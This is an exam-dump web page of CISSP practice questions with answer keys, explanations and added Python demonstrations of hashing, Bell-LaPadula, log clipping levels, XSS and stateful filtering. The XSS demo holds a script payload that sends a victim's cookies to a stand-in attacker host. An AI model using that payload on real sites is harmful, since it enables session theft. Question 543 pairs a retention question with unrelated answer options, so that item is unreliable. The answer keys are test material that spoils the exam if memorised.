Get Latest [Oct-2021] Dumpexams CISSP Exam PDF
Difficulty in Writing the CISSP Test: Certified Information Systems Security Professional
There are two primary kinds of resources for certification exam preparation. First there are the study guides and books, which are detailed and suited to building knowledge from the ground up. Then there are video tutorials and lectures, which can ease the pain of study and are less exhausting for some candidates, but these still demand time and focus from the student. Candidates who want to build a strong foundation across all exam topics and related technologies usually combine video lectures with study guides to get the benefits of both, but one important preparation tool is neglected by most applicants: practice tests. Practice tests are built to make students comfortable with the real exam environment. Statistics have shown that most students fail not because of poor preparation but because of exam anxiety, the fear of the unknown. The Certificate questions.com expert team recommends that you prepare notes on these subjects and, alongside them, work through the ISC CISSP practice exam and ISC CISSP practice tests written by our expert team. Both will help you a great deal to clear this exam with good marks.
NEW QUESTION 527
Suppose that you are the COMSEC - Communications Security custodian for a large, multinational corporation. Susie, from Finance approaches you in the break room saying that she lost her smart ID card that she uses to digitally sign and encrypt emails in the PKI.
What happens to the certificates contained on the smart card after the security officer takes appropriate action?
- A. New certificates are issued to the user
- B. They are added to the CRL
- C. They are reissued to the user
- D. The user may no longer have certificates
Answer: B
Explanation:
A certificate that is no longer trusted should be revoked.
The CA is responsible for creating and handing out certificates, maintaining them, and revoking them if necessary. Revocation is handled by the CA, and the revoked certificate information is stored on a certificate revocation list (CRL). This is a list of every certificate that has been revoked. This list is maintained and updated periodically. A certificate may be revoked because the key holder's private key was compromised or because the CA discovered the certificate was issued to the wrong person. Note that revocation only takes effect for relying parties that actually fetch a fresh CRL (or query OCSP) before trusting a certificate, so the CA must publish the updated list promptly and clients must be configured to check it.
An analogy for the use of a CRL is how a driver's license is used by a police officer. If an officer pulls over Sean for speeding, the officer will ask to see Sean's license. The officer will then run a check on the license to find out if Sean is wanted for any other infractions of the law and to verify the license has not expired. The same thing happens when a person compares a certificate to a CRL. If the certificate became invalid for some reason, the CRL is the mechanism for the CA to let others know this information.
Incorrect Answers:
A: New certificates (containing new keys) should be issued to the user. However, this question is asking about the certificates stored on the lost smart card. The certificates contained on the smart card should be revoked.
C: The certificates contained on the smart card should be revoked to invalidate them. They should not be reissued; new certificates (with a different key pair) should be issued.
D: It is not true that the user may no longer have certificates. New certificates with different keys can be issued to the user while the old certificates (the ones on the smart card) are revoked.
References:
Harris, Shon, All In One CISSP Exam Guide, 6th Edition, McGraw-Hill, 2013, pp. 836-837
NEW QUESTION 528
Why should batch files and scripts be stored in a protected area?
- A. Because of the need-to-know concept
- B. Because they may contain credentials
- C. Because they cannot be accessed by operators
- D. Because of the least privilege concept
Answer: B
Explanation:
Batch files and scripts are often written to run unattended, so they frequently embed user IDs, passwords, API keys or database connection strings in clear text. Anyone who can read such a file can harvest those credentials, which is why the files belong in a protected area with restricted access (Topic 5, Operations Security).
NEW QUESTION 529
Which one of the following is an advantage of an effective release control strategy from a configuration control standpoint?
- A. Ensures that a trace for all deliverables is maintained and auditable
- B. Ensures that there is no loss of functionality between releases
- C. Allows for future enhancements to existing features
- D. Enforces backward compatibility between releases
Answer: A
NEW QUESTION 530
Conducting a search without the delay of obtaining a warrant if destruction of evidence seems imminent is possible under:
- A. Exigent Circumstances.
- B. Prudent Man Rule.
- C. Proximate Causation.
- D. Federal Sentencing Guidelines.
Answer: A
Explanation:
Exigent circumstances permit a search or seizure without first obtaining a warrant when waiting for one would likely allow the evidence to be destroyed. The other answers refer to other principles, guidelines, or rules.
NEW QUESTION 531
What level of assurance for a digital certificate verifies a user's name, address, social security number, and other information against a credit bureau database?
- A. Level 3/Class 3
- B. Level 1/Class 1
- C. Level 4/Class 4
- D. Level 2/Class 2
Answer: D
Explanation:
Users can obtain certificates with various levels of assurance. Here is a list that describes each of them:
- Class 1/Level 1 is for individuals, intended for email, with no proof of identity. For example, level 1 certificates verify electronic mail addresses. This is done through the use of a personal information number that a user would supply when asked to register. This level of certificate may also provide a name as well as an electronic mail address; however, it may or may not be a genuine name (i.e., it could be an alias). This proves that a human being will reply back if you send an email to that name or email address.
- Class 2/Level 2 is for organizations and companies for which proof of identity is required. Level 2 certificates verify a user's name, address, social security number, and other information against a credit bureau database.
- Class 3/Level 3 is for servers and software signing, for which independent verification and checking of identity and authority is done by the issuing certificate authority. Level 3 certificates are available to companies. This level of certificate provides photo identification to accompany the other items of information provided by a level 2 certificate.
- Class 4 is for online business transactions between companies.
- Class 5 is for private organizations or governmental security.
These classes are VeriSign's historical scheme; public web PKI certificate authorities today describe assurance in terms of domain-validated (DV), organization-validated (OV) and extended-validation (EV) certificates instead.
References:
http://en.wikipedia.org/wiki/Digital_certificate (VeriSign introduced the concept of classes of digital certificates)
Also see:
TIPTON, Harold F. & KRAUSE, Micki, Information Security Management Handbook, 4th edition (volume 1), 2000, CRC Press, Chapter 3, Secured Connections to External Networks (page 54).
NEW QUESTION 532
What is the prime directive of Risk Management?
- A. Reduce the risk to a tolerable level.
- B. Reduce all risks regardless of cost.
- C. Prosecute any employees that are violating published security policies.
- D. Transfer any risk to external third parties.
Answer: A
Explanation:
The correct answer is "Reduce the risk to a tolerable level." Risk can never be eliminated, and risk management must find the level of risk the organization can tolerate and still function effectively.
NEW QUESTION 533
Which of the following is the MOST likely cause of a non-malicious data breach when the source of the data breach was an un-marked file cabinet containing sensitive documents?
- A. Lack of Data Loss Prevention (DLP) tools
- B. Ineffective identity management controls
- C. Lack of data access controls
- D. Ineffective data classification
Answer: D
NEW QUESTION 534
Which of the following would be the best reason for separating the test and development environments?
- A. To control the stability of the test environment.
- B. To segregate user and development staff.
- C. To secure access to systems under development.
- D. To restrict access to systems under test.
Answer: A
Explanation:
The test environment must be controlled and stable in order to ensure that development projects are tested in a realistic environment which, as far as possible, mirrors the live environment.
Reference(s) used for this question:
Information Systems Audit and Control Association, Certified Information Systems Auditor 2002 review manual, chapter 6: Business Application System Development, Acquisition, Implementation and Maintenance (page 309).
NEW QUESTION 535
What is probing used for?
- A. To induce a user into taking an incorrect action
- B. To covertly listen to transmissions
- C. To use up all of a target's resources
- D. To give an attacker a road map of the network
Answer: D
Explanation:
The correct answer is "To give an attacker a road map of the network". Probing is a procedure whereby the intruder runs programs that scan the network to create a network map for later intrusion.
"To induce a user into taking an incorrect action" describes spoofing, "To use up all of a target's resources" is the objective of a DoS attack, and "To covertly listen to transmissions" is passive eavesdropping.
NEW QUESTION 536
Which of the following is NOT a characteristic of a cryptographic hash function, H (m), where m denotes the message being hashed by the function H?
- A. The output is of fixed length.
- B. H (m) is a one-way function.
- C. H (m) is difficult to compute for any given m.
- D. H (m) is collision free.
Answer: C
Explanation:
For a cryptographic hash function, H (m) is relatively easy to compute for a given m.
*Answer "H (m) is collision free" is a characteristic of a good cryptographic hash function, in that collision free means that for a given message, M, that produces H (M) = Z, it is computationally infeasible to find another message, M1, such that H (M1) = Z.
*Answer "The output is of fixed length" is part of the definition of a hash function since it generates a fixed-length result that is independent of the length of the input message. This characteristic is useful for generating digital signatures since the signature can be applied to the fixed-length hash that is uniquely characteristic of the message instead of to the entire message, which is usually much longer than the hash.
*Answer "H (m) is a one-way function" relates to answer "H (m) is difficult to compute for any given m" in that a one-way function is difficult or impossible to invert. This means that for a hash function H (M) = Z, it is computationally infeasible to reverse the process and find M given the hash Z and the function H.
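Added example, not part of the original question or its references: the following Python checks the fixed-length property directly and shows why "collision free" is a statement about computational cost rather than impossibility. It runs a birthday search on SHA-256 truncated to 24 bits (a constructed toy, assumed here only so the search finishes instantly) and finds a collision after a few thousand evaluations; the same search against the full 256-bit output would need on the order of 2^128 evaluations.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    """Full SHA-256 digest of the message, as hex."""
    return hashlib.sha256(data).hexdigest()


def fixed_length_outputs(messages):
    """Digest sizes (in bits) produced for the given messages. A hash
    function returns the same size no matter how long the input is, so
    this set should contain exactly one value."""
    return {len(hashlib.sha256(m).digest()) * 8 for m in messages}


def truncated_hash(data: bytes, bits: int) -> int:
    """Toy hash for the demonstration only: SHA-256 with the output cut
    down to `bits` bits. Shrinking the output is what makes collisions
    cheap; a real digest keeps all 256 bits."""
    digest = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return digest >> (256 - bits)


def find_collision(bits: int, limit: int = 1_000_000):
    """Birthday search: hash distinct messages until two of them produce
    the same truncated output and return that pair (or None). Expected
    work is about 2**(bits / 2) hash evaluations, which is why a 256-bit
    digest (about 2**128 work) is considered collision free in practice."""
    seen = {}
    for i in range(limit):
        m = b"msg-%d" % i          # constructed, distinct messages
        h = truncated_hash(m, bits)
        if h in seen:
            return seen[h], m
        seen[h] = m
    return None


if __name__ == "__main__":
    print(fixed_length_outputs([b"", b"a", b"x" * 100_000]))
    m1, m2 = find_collision(24)
    print(m1, m2, truncated_hash(m1, 24) == truncated_hash(m2, 24))
    print(sha256_hex(m1) == sha256_hex(m2))   # False: the full digests still differ
```

The two colliding messages agree on the 24-bit toy output but not on the full SHA-256 digest, which is the practical meaning of answer D: collisions exist in principle for any fixed-length function, but finding one for a full-size modern digest is infeasible.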
NEW QUESTION 537
For competitive reasons, the customers of a large shipping company called the "Integrated International Secure Shipping Containers Corporation" (IISSCC) like to keep private the various cargos that they ship. IISSCC uses a secure database system based on the Bell-LaPadula access control model to keep this information private. Different information in this database is classified at different levels. For example, the time and date a ship departs is labeled Unclassified, so customers can estimate when their cargos will arrive, but the contents of all shipping containers on the ship are labeled Top Secret to keep different shippers from viewing each other's cargos.
An unscrupulous fruit shipper, the "Association of Private Fruit Exporters, Limited" (APFEL) wants to learn whether or not a competitor, the "Fruit Is Good Corporation" (FIGCO), is shipping pineapples on the ship "S.S. Cruise Pacific" (S.S. CP). APFEL can't simply read the top secret contents in the IISSCC database because of the access model. A smart APFEL worker, however, attempts to insert a false, unclassified record in the database that says that FIGCO is shipping pineapples on the S.S. CP, reasoning that if there is already a FIGCO-pineapple-SSCP record then the insertion attempt will fail. But the attempt does not fail, so APFEL can't be sure whether or not FIGCO is shipping pineapples on the S.S. CP.
What is the name of the access control model property that prevented APFEL from reading FIGCO's cargo information? What is a secure database technique that could explain why, when the insertion attempt succeeded, APFEL was still unsure whether or not FIGCO was shipping pineapples?
- A. Simple Security Property and Polymorphism
- B. Strong *-Property and Polyinstantiation
- C. Simple Security Property and Polyinstantiation
- D. *-Property and Polymorphism
Answer: C
Explanation:
The Simple Security Property states that a subject at a given clearance may not read an object at a higher classification, so unclassified APFEL could not read FIGCO's top secret cargo information.
Polyinstantiation permits a database to have two records that are identical except for their classifications (i.e., the primary key includes the classification). Thus, APFEL's new unclassified record did not collide with the real, top secret record, so APFEL was not able to learn about FIGCO's pineapples.
The following answers are incorrect:
*-Property and Polymorphism
The *-property states that a subject at a given clearance must not write to any object at a lower classification, which is irrelevant here because APFEL was trying to read data with a higher classification.
Polymorphism is a term that can refer to, among other things, viruses that can change their code to better hide from anti-virus programs or to objects of different types in an object- oriented program that are related by a common superclass and can, therefore, respond to a common set of methods in different ways. That's also irrelevant to this question.
Strong *-Property and Polyinstantiation
Half-right. The strong *-property limits a subject of a given clearance to writing only to objects with a matching classification. APFEL's attempt to insert an unclassified record was consistent with this property, but that has nothing to do with preventing APFEL from reading top secret information.
Simple Security Property and Polymorphism
Also half-right. See above for why Polymorphism is wrong.
The following reference(s) were/was used to create this question:
HARRIS, Shon, CISSP All-in-one Exam Guide, Third Edition, McGraw-Hill/Osborne, 2005
Chapter 5: Security Models and Architecture (page 280)
Chapter 11: Application and System Development (page 828)
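Added example, not from the original question or Harris's text: a Python model of the IISSCC scenario with a constructed two-level scheme and invented record values. Reads enforce the Simple Security Property, and the primary key can be built with or without the classification so the same probe can be replayed against a polyinstantiated table and against a plain one, where the duplicate-key failure is exactly the inference channel APFEL was hoping for.

```python
# Constructed two-level classification scheme for the IISSCC scenario.
LEVELS = {"Unclassified": 0, "Top Secret": 1}


class CargoDatabase:
    """Cargo records keyed by (ship, shipper) and, when polyinstantiated,
    also by classification, so two rows may differ only in their label."""

    def __init__(self, polyinstantiated=True):
        self.polyinstantiated = polyinstantiated
        self.rows = {}  # primary key -> (classification, cargo)

    def _key(self, ship, shipper, classification):
        if self.polyinstantiated:
            return (ship, shipper, classification)
        return (ship, shipper)

    def read(self, clearance, ship, shipper):
        """Simple Security Property (no read up): return only rows whose
        classification is dominated by the caller's clearance, keyed by label."""
        return {
            level: cargo
            for key, (level, cargo) in self.rows.items()
            if key[0] == ship and key[1] == shipper
            and LEVELS[level] <= LEVELS[clearance]
        }

    def insert(self, clearance, ship, shipper, cargo):
        """Insert a row at the caller's own level (consistent with the
        *-property). Fails only on a duplicate primary key; whether that
        key includes the classification decides if a low-level insert can
        collide with, and so reveal, a high-level row."""
        key = self._key(ship, shipper, clearance)
        if key in self.rows:
            return False
        self.rows[key] = (clearance, cargo)
        return True


def apfel_probe(polyinstantiated=True):
    """Replay the scenario: FIGCO's Top Secret row exists; APFEL, cleared
    Unclassified, first tries to read it and then inserts a false
    Unclassified row with the same ship and shipper."""
    db = CargoDatabase(polyinstantiated)
    db.insert("Top Secret", "S.S. CP", "FIGCO", "pineapples")  # constructed data
    return {
        "read_before": db.read("Unclassified", "S.S. CP", "FIGCO"),
        "insert_ok": db.insert("Unclassified", "S.S. CP", "FIGCO", "pineapples"),
        "unclassified_view": db.read("Unclassified", "S.S. CP", "FIGCO"),
        "top_secret_view": db.read("Top Secret", "S.S. CP", "FIGCO"),
    }


if __name__ == "__main__":
    print("polyinstantiated:", apfel_probe(True))
    print("plain table:     ", apfel_probe(False))
```

With polyinstantiation the probe insert succeeds and APFEL sees only its own row, while a Top Secret reader sees both rows and must reconcile them; without it the insert fails and the failure itself tells APFEL that a FIGCO row already exists.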
NEW QUESTION 538
DRAG DROP
In which order should the following steps be taken to create an emergency management plan?
Answer:
Explanation:
The proper order of steps in the emergency management planning process is:
1. Establish a planning team
2. Analyze capabilities and hazards
3. Develop the plan
4. Implement the plan
Source: Emergency Management Guide for Business and Industry, Federal Emergency Management Agency, August 1998.
NEW QUESTION 539
What security model implies a central authority that determines what subjects can have access to what objects?
- A. Non-discretionary access control
- B. Discretionary access control
- C. Centralized access control
- D. Mandatory access control
Answer: A
Explanation:
A role-based access control (RBAC) model, also called nondiscretionary access control, uses a centrally administrated set of controls to determine how subjects and objects interact. - Shon Harris, "CISSP All-in-One Exam Guide", 3rd Ed, p 165.
NEW QUESTION 540
In what way can violation clipping levels assist in violation tracking and analysis?
- A. Clipping levels enable the security administrator to customize the audit trail to record only actions for users with access to usercodes with a privileged status
- B. Clipping levels enable a security administrator to customize the audit trail to record only those violations which are deemed to be security relevant
- C. Clipping levels enable a security administrator to view all reductions in security levels which have been made to usercodes which have incurred violations
- D. Clipping levels set a baseline for normal user errors, and violations exceeding that threshold will be recorded for analysis of why the violations occurred
Answer: D
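Added example, not part of the original question: the following Python applies a clipping level to a constructed set of audit lines (the log format, user names and timestamps are invented for the illustration). Failed logins at or below the threshold within the window are treated as ordinary user error and ignored; only users whose failures exceed it are reported for analysis, which is what answer D describes.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample audit trail; not taken from any real system.
SAMPLE_LOG = """\
2021-10-04T09:00:01 user=alice event=login result=FAIL
2021-10-04T09:00:07 user=alice event=login result=OK
2021-10-04T09:01:10 user=bob event=login result=FAIL
2021-10-04T09:01:12 user=bob event=login result=FAIL
2021-10-04T09:01:15 user=bob event=login result=FAIL
2021-10-04T09:01:19 user=bob event=login result=FAIL
2021-10-04T09:01:23 user=bob event=login result=FAIL
2021-10-04T09:30:00 user=carol event=login result=FAIL
2021-10-04T10:45:00 user=carol event=login result=FAIL
2021-10-04T10:46:00 user=carol event=login result=FAIL
2021-10-04T10:47:00 user=carol event=login result=FAIL
"""

# Only failed login events count as violations for this clipping level.
LINE_RE = re.compile(r"^(\S+) user=(\S+) event=login result=FAIL$")


def violations_over_clipping_level(log_text, threshold=3, window=timedelta(minutes=10)):
    """Return {user: worst_count} for users whose failed logins inside any
    sliding `window` exceed the clipping level `threshold`. Counts at or
    below the threshold are the expected baseline of user error and are
    deliberately not reported, so the analyst sees only the excess."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            failures[m.group(2)].append(datetime.fromisoformat(m.group(1)))

    flagged = {}
    for user, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window start forward until it fits within `window`.
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count > threshold:
                flagged[user] = max(flagged.get(user, 0), count)
    return flagged


if __name__ == "__main__":
    print(violations_over_clipping_level(SAMPLE_LOG))
```

In the sample, alice's single failure and carol's failures spread over more than an hour stay under the level and are not recorded, while bob's burst of five within seconds exceeds it and is reported; lowering the threshold to 2 also surfaces carol's three failures within three minutes.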
NEW QUESTION 541
Which of the following would best describe a cold backup site?
- A. A computer facility with electrical power and HVAC, all needed applications installed and configured on the file/print servers, and enough workstations present to begin processing
- B. A computer facility with electrical power and HVAC but with no workstations or servers on-site prior to the event and no applications installed
- C. A computer facility available with electrical power and HVAC and some file/print servers, although the applications are not installed or configured and all of the needed workstations may not be on site or ready to begin processing
- D. A computer facility with no electrical power or HVAC
Answer: B
Explanation:
A computer facility with electrical power and HVAC, with workstations and servers available to be brought on-site when the event begins and no applications installed, is a cold site.
* Answer "A computer facility with electrical power and HVAC, all needed applications installed and configured on the file/print servers, and enough workstations present to begin processing" is a hot site.
* Answer "A computer facility available with electrical power and HVAC and some file/print servers, although the applications are not installed or configured and all of the needed workstations may not be on site or ready to begin processing" is a warm site.
* Answer "A computer facility with no electrical power or HVAC" is just an empty room.
NEW QUESTION 542
Which of the following technologies is a target of XSS or CSS (Cross-Site Scripting) attacks?
- A. DNS Servers
- B. Web Applications
- C. Firewalls
- D. Intrusion Detection Systems
Answer: B
Explanation:
XSS or Cross-Site Scripting is a threat to web applications where malicious code is placed on a website that attacks the user using their existing authenticated session status.
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.
Mitigation:
-Context-aware output encoding of all untrusted data before it is placed in HTML, attributes, JavaScript or URLs; this is the primary defense.
-Input validation on the web application to normalize inputted data.
-Mark session cookies HttpOnly so that injected script cannot read them.
-Configure your IPS (Intrusion Prevention System) to detect and suppress this traffic.
-Set web apps to bind session cookies to the IP address of the legitimate user and only permit that IP address to use that cookie.
See the XSS (Cross Site Scripting) Prevention Cheat Sheet.
See the Abridged XSS Prevention Cheat Sheet.
See the DOM based XSS Prevention Cheat Sheet.
See the OWASP Development Guide article on Phishing.
See the OWASP Development Guide article on Data Validation.
The following answers are incorrect:
-Intrusion Detection Systems: Sorry. IDS systems aren't usually the target of XSS attacks, but a properly-configured IDS/IPS can detect and report on malicious strings and suppress the TCP connection in an attempt to mitigate the threat.
-Firewalls: Sorry. Firewalls aren't usually the target of XSS attacks.
-DNS Servers: Same as above, DNS Servers aren't usually targeted in XSS attacks but they play a key role in the domain name resolution in the XSS attack process.
The following reference(s) was used to create this question:
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
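Added example, not from the original page or from OWASP: a vulnerable renderer that concatenates user input straight into HTML beside a hardened version that HTML-encodes the value for the element body context. The function names, the greeting page and the attacker payload are constructed for the illustration; attacker.invalid is a reserved name that never resolves.

```python
import html


def render_greeting_unsafe(name: str) -> str:
    """Vulnerable: untrusted input is concatenated straight into the HTML
    response, so markup in `name` becomes markup in the page."""
    return "<p>Welcome back, " + name + "</p>"


def render_greeting_safe(name: str) -> str:
    """Hardened: the untrusted value is HTML-entity-encoded for the element
    body context, so the browser renders it as text rather than markup."""
    return "<p>Welcome back, " + html.escape(name, quote=True) + "</p>"


def contains_script_tag(page: str) -> bool:
    """Crude detector used only to compare the two renderers: is there a
    literal <script start tag left in the output?"""
    return "<script" in page.lower()


# Constructed attacker input: exfiltrates the victim's cookies to a host
# the attacker controls, which is the cookie theft described above.
PAYLOAD = ('<script>new Image().src="https://attacker.invalid/c?"'
           '+document.cookie</script>')


if __name__ == "__main__":
    print(render_greeting_unsafe(PAYLOAD))   # script tag survives: XSS
    print(render_greeting_safe(PAYLOAD))     # rendered as harmless text
```

Encoding is context-specific: html.escape is correct for element content and quoted attribute values, but a value placed inside a JavaScript string or a URL needs the encoding for that context instead. Marking the session cookie HttpOnly is a separate, complementary control that limits what a script that does get injected can read.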
NEW QUESTION 543
How should the retention period for an organization's social media content be defined?
- A. Wireless Access Points (AP)
- B. Trusted platforms
- C. Host-based firewalls
- D. Token-based authentication
Answer: C
NEW QUESTION 544
Which of the following type of traffic can easily be filtered with a stateful packet filter by enforcing the context or state of the request?
- A. TCP
- B. ICMP
- C. IP
- D. UDP
Answer: A
Explanation:
The question is explicit in asking *easily*. With TCP connection establishment there is a distinct state or sequence that can be expected. Consult the references for further details.
ICMP, IP and UDP don't have any concept of a session; i.e. each packet or datagram is handled individually, with no reference to the contents of the previous one. With no sessions, these protocols usually cannot be filtered on the state of the session.
Some newer firewalls, however, simulate the concept of state for these protocols, and filter out unexpected packets based upon normal usage. Although these are commonly treated like normal stateful filters, they are more complex to program, and hence more prone to errors.
A stateful packet filter or stateful inspection inspects each packet and only allows known connection states through. So, if a SYN/ACK packet was received and there was no prior SYN packet sent, the filter would drop that packet and not let it in. The correct sequence of steps is known and if the sequence or state is incorrect then the packet is dropped.
The incorrect answers are: ICMP. ICMP is basically stateless so you could not *easily* filter them based on the state or sequence.
UDP. UDP has no real state so you could only partially filter them based on the state or sequence. The question was explicit in asking *easily*. While it is possible, UDP is not the best answer.
IP. IP would refer to the Internet Protocol and as such is stateless so you would not be able to filter it out *easily*.
The following reference(s) were used for this question:
http://www.nwo.net/ipf/ipf-howto.pdf
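Added example, not taken from the original page or its reference: a minimal stateful TCP filter in Python that tracks the SYN, SYN/ACK, ACK sequence per connection and drops a SYN/ACK for which no SYN was sent. The inside address range, the packet representation and the sample packets are assumptions made for the illustration; a real firewall also tracks sequence numbers, FIN/RST teardown and idle timeouts.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str  # TCP flag string: "S" = SYN, "SA" = SYN/ACK, "A" = ACK


class StatefulTcpFilter:
    """Minimal stateful packet filter for TCP. A connection entry is created
    only by an outbound SYN from the inside network; later packets are
    allowed only if they fit the expected state for that entry."""

    def __init__(self, inside_prefixes=("10.0.0.",)):   # assumed inside range
        self.inside_prefixes = inside_prefixes
        self.table = {}  # (client, cport, server, sport) -> state

    def _inside(self, ip):
        return ip.startswith(self.inside_prefixes)

    def process(self, p):
        """Return True to forward the packet, False to drop it."""
        fwd = (p.src, p.sport, p.dst, p.dport)   # as sent by the client
        rev = (p.dst, p.dport, p.src, p.sport)   # as sent by the server
        if p.flags == "S":
            if self._inside(p.src) and fwd not in self.table:
                self.table[fwd] = "SYN_SENT"
                return True
            return False                         # unsolicited inbound SYN
        if p.flags == "SA":
            if self.table.get(rev) == "SYN_SENT":
                self.table[rev] = "SYN_RECEIVED"
                return True
            return False                         # SYN/ACK with no prior SYN
        if p.flags == "A":
            if self.table.get(fwd) == "SYN_RECEIVED":
                self.table[fwd] = "ESTABLISHED"  # handshake completed
                return True
            if self.table.get(fwd) == "ESTABLISHED" or self.table.get(rev) == "ESTABLISHED":
                return True                      # data in either direction
            return False                         # ACK for an unknown connection
        return False


def filter_trace(packets, **kwargs):
    """Run a list of packets through a fresh filter; return the decisions."""
    f = StatefulTcpFilter(**kwargs)
    return [f.process(p) for p in packets]


if __name__ == "__main__":
    c, s = "10.0.0.5", "203.0.113.7"   # constructed addresses
    handshake = [Packet(c, 40000, s, 443, "S"), Packet(s, 443, c, 40000, "SA"),
                 Packet(c, 40000, s, 443, "A")]
    print(filter_trace(handshake))                                   # [True, True, True]
    print(filter_trace([Packet("203.0.113.9", 443, c, 40001, "SA")]))  # [False]
```

The decision for the stray SYN/ACK depends entirely on the connection table, which is the "context or state of the request" the question refers to; a stateless packet filter looking at that packet alone has no basis to reject it.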
NEW QUESTION 545
Which one of the following authentication mechanisms creates a problem for mobile users?
- A. One-time password mechanism.
- B. Mechanism with reusable passwords
- C. Challenge response mechanism.
- D. Mechanisms based on IP addresses
Answer: D
Explanation:
Anything based on a fixed IP address would be a problem for mobile users because their location and its associated IP address can change from one time to the next.
Many providers will assign a new IP every time the device would be restarted. For example an insurance adjuster using a laptop to file claims online. He goes to a different client each time and the address changes every time he connects to the ISP.
NOTE FROM CLEMENT:
The term MOBILE in this case is synonymous with Road Warriors where a user is constantly traveling and changing location. With smartphone today that may not be an issue but it would be an issue for laptops or WIFI tablets. Within a carrier network the IP will tend to be the same and would change rarely. So this question is more applicable to devices that are not cellular devices but in some cases this issue could affect cellular devices as well.
The following answers are incorrect:
Mechanism with reusable passwords. This is incorrect because a reusable password mechanism would not present a problem for mobile users. They are the least secure and change only at specific intervals.
One-time password mechanism. This is incorrect because a one-time password mechanism would not present a problem for mobile users. Many are based on a clock and not on the IP address of the user.
Challenge response mechanism. This is incorrect because a challenge response mechanism would not present a problem for mobile users.
NEW QUESTION 546
You have been approached by one of your clients. They are interested in doing some security re-engineering. The client is looking at various information security models. It is a highly secure environment where data at high classifications cannot be leaked to subjects at lower classifications. Of primary concern to them is the identification of potential covert channels. As an Information Security Professional, which model would you recommend to the client?
- A. Information Flow Model combined with Bell Lapadula
- B. Biba
- C. Bell Lapadula
- D. Information Flow Model
Answer: A
Explanation:
Securing the data manipulated by computing systems has been a challenge in the past years. Several methods to limit the information disclosure exist today, such as access control lists, firewalls, and cryptography. However, although these methods do impose limits on the information that is released by a system, they provide no guarantees about information propagation. For example, access control lists of file systems prevent unauthorized file access, but they do not control how the data is used afterwards. Similarly, cryptography provides a means to exchange information privately across a non-secure channel, but no guarantees about the confidentiality of the data are given once it is decrypted.
In low level information flow analysis, each variable is usually assigned a security level. The basic model comprises two distinct levels: low and high, meaning, respectively, publicly observable information, and secret information. To ensure confidentiality, flowing information from high to low variables should not be allowed. On the other hand, to ensure integrity, flows to high variables should be restricted.
More generally, the security levels can be viewed as a lattice with information flowing only upwards in the lattice.
Noninterference Models
This could have been another good answer as it would help in minimizing the damage from covert channels.
The goal of a noninterference model is to help ensure that high-level actions (inputs) do not determine what low-level users can see (outputs). Most of the security models presented are secured by permitting restricted flows between high- and low-level users. The noninterference model maintains activities at different security levels to separate these levels from each other. In this way, it minimizes leakages that may happen through covert channels, because there is complete separation (noninterference) between security levels. Because a user at a higher security level has no way to interfere with the activities at a lower level, the lower-level user cannot get any information from the higher level.
The following answers are incorrect:
Bell Lapadula
The Bell-LaPadula Model (abbreviated BLP) is a state machine model used for enforcing access control in government and military applications. It was developed by David Elliott Bell and Leonard J. LaPadula, subsequent to strong guidance from Roger R. Schell, to formalize the U.S. Department of Defense (DoD) multilevel security (MLS) policy. The model is a formal state transition model of computer security policy that describes a set of access control rules which use security labels on objects and clearances for subjects. Security labels range from the most sensitive (e.g. "Top Secret") down to the least sensitive (e.g. "Unclassified" or "Public").
The Bell-LaPadula model focuses on data confidentiality and controlled access to classified information, in contrast to the Biba Integrity Model which describes rules for the protection of data integrity. In this formal model, the entities in an information system are divided into subjects and objects. The notion of a "secure state" is defined, and it is proven that each state transition preserves security by moving from secure state to secure state, thereby inductively proving that the system satisfies the security objectives of the model. The Bell-LaPadula model is built on the concept of a state machine with a set of allowable states in a computer network system. The transition from one state to another state is defined by transition functions.
A system state is defined to be "secure" if the only permitted access modes of subjects to objects are in accordance with a security policy. To determine whether a specific access mode is allowed, the clearance of a subject is compared to the classification of the object (more precisely, to the combination of classification and set of compartments, making up the security level) to determine if the subject is authorized for the specific access mode. The clearance/classification scheme is expressed in terms of a lattice. The model defines two mandatory access control (MAC) rules and one discretionary access control (DAC) rule with three security properties:
The Simple Security Property: a subject at a given security level may not read an object at a higher security level (no read-up).
The *-property (read "star"-property): a subject at a given security level must not write to any object at a lower security level (no write-down). The *-property is also known as the Confinement property.
The Discretionary Security Property: use of an access matrix to specify the discretionary access control.
The transfer of information from a high-sensitivity document to a lower-sensitivity document may happen in the Bell-LaPadula model via the concept of trusted subjects. Trusted subjects are not restricted by the *-property. Untrusted subjects are. Trusted subjects must be shown to be trustworthy with regard to the security policy. This security model is directed toward access control and is characterized by the phrase: "no read up, no write down."
With Bell-LaPadula, users can create content only at or above their own security level (i.e. secret researchers can create secret or top-secret files but may not create public files; no write-down). Conversely, users can view content only at or below their own security level (i.e. secret researchers can view public or secret files, but may not view top-secret files; no read-up).
The Bell-LaPadula model explicitly defined its scope. It did not treat the following extensively:
Covert channels. Passing information via pre-arranged actions was described briefly.
Networks of systems. Later modeling work did address this topic.
Policies outside multilevel security. Work in the early 1990s showed that MLS is one version of boolean policies, as are all other published policies.
Biba
The Biba Model or Biba Integrity Model, developed by Kenneth J. Biba in 1977, is a formal state transition system of computer security policy that describes a set of access control rules designed to ensure data integrity. Data and subjects are grouped into ordered levels of integrity. The model is designed so that subjects may not corrupt objects in a level ranked higher than the subject, or be corrupted by objects from a lower level than the subject.
In general the model was developed to circumvent a weakness in the Bell-LaPadula model which only addresses data confidentiality.
In general, preservation of data integrity has three goals:
Prevent data modification by unauthorized parties
Prevent unauthorized data modification by authorized parties
Maintain internal and external consistency (i.e. data reflects the real world)
Note: Biba addresses only the first goal of integrity while Clark-Wilson addresses all three.
